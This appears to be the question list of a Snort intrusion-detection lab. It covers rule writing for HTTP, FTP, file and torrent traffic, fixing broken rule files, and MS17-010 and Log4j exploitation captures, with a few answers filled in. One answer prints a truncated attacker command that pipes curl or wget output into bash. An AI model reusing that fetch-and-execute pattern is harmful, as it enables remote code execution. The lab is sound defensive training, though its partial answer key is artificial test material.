Snort Challenge - The Basics
Navigate to the task folder. Use the given pcap file.
Write rules to detect "all TCP port 80 traffic" packets in the given pcap file.
What is the number of detected packets?
Note: You must answer this question correctly before answering the rest of the questions in this task.
Investigate the log file. What is the destination address of packet 63?
Investigate the log file. What is the ACK number of packet 64?
Investigate the log file. What is the SEQ number of packet 62?
Investigate the log file. What is the TTL of packet 65?
Investigate the log file. What is the source IP of packet 65?
Investigate the log file. What is the source port of packet 65?
Navigate to the task folder. Use the given pcap file.
Write rules to detect "all TCP port 21" traffic in the given pcap.
What is the number of detected packets?
Investigate the log file. What is the FTP service name?
Microsoft FTP Service
Write a rule to detect failed FTP login attempts in the given pcap. What is the number of detected packets?
Write a rule to detect successful FTP logins in the given pcap. What is the number of detected packets?
Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password. What is the number of detected packets?
Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.
What is the number of detected packets?
Write a rule to detect the PNG file in the given pcap. Investigate the logs and identify the software name embedded in the packet.
Adobe ImageReady
Write a rule to detect the GIF file in the given pcap. Investigate the logs and identify the image format embedded in the packet.
Write a rule to detect the torrent metafile in the given pcap. What is the number of detected packets?
Investigate the log/alarm files. What is the name of the torrent application?
Investigate the log/alarm files.
What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?
Investigate the log/alarm files. What is the hostname of the torrent metafile?
You can test each ruleset with the following command structure;
sudo snort -c local-X.rules -r mx-1.pcap -A console
Fix the syntax error in local-1.rules file and make it work smoothly. What is the number of the detected packets?
Fix the syntax error in local-2.rules file and make it work smoothly. What is the number of the detected packets?
Fix the syntax error in local-3.rules file and make it work smoothly. What is the number of the detected packets?
Fix the syntax error in local-4.rules file and make it work smoothly. What is the number of the detected packets?
Fix the syntax error in local-5.rules file and make it work smoothly. What is the number of the detected packets?
Fix the logical error in local-6.rules file and make it work smoothly to create alerts. What is the number of the detected packets?
Fix the logical error in local-7.rules file and make it work smoothly to create alerts. What is the name of the required option:
Use the given rule file (local.rules) to investigate the ms1710 exploitation. What is the number of detected packets?
Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword. What is the number of detected packets?
Investigate the log/alarm files. What is the requested path?
What is the CVSS v2 score of the MS17-010 vulnerability?
Use the given rule file (local.rules) to investigate the log4j exploitation. What is the number of detected packets?
Investigate the log/alarm files. How many rules were triggered?.
Investigate the log/alarm files. What are the first six digits of the triggered rule sids?
Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. What is the number of detected packets?
Investigate the log/alarm files. What is the name of the used encoding algorithm?
Investigate the log/alarm files. What is the IP ID of the corresponding packet?
Investigate the log/alarm files. Decode the encoded command. What is the attacker's command?
(curl -s||wget -q -O-|bash
What is the CVSS v2 score of the Log4j vulnerability?